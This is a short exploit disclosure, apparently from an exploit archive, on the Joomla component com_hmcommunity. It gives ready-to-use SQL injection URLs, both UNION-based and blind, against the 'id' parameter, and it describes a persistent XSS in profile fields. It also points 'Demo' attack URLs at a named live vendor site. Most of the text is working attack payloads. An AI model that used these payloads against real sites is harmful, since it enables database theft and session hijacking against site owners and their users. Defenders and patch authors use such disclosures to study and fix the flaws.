_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ _0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ _0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ _____0______0______0__0______0___0__0________0___0__00000__0___0_ _0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ _________________________________________________________________ # [+] Joomla Compenent com_hmcommunity Multiple Vulnerabilities # [+] Software : Joomla # [+] Download : http://joomlaextensions.co.in/product/HM-Community # [+] Author : 599eme Man # [+] Contact : Flouf@live.fr # #[------------------------------------------------------------------------------------] # # [+] Vulnerabilities # # [+] SQL # # - http://site.com/index.php?option=com_hmcommunity&view=fnd_home&id=[NB] union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- # # [+] Demo # # - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155 union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- # # [+] Blind SQL # # - http://site.com//index.php?option=com_hmcommunity&view=fnd_home&id=155 and @@version=5 # # [+] Demo # # - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155%20and%20@@version=5 # # [+] Persistent XSS # # - The XSS is on the profile. You have to create an account and put your code in inputs. # # [+] Demo # # - Create an account and look this profile : http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_profile&uid=155 # #[------------------------------------------------------------------------------------] # #########################################################################################################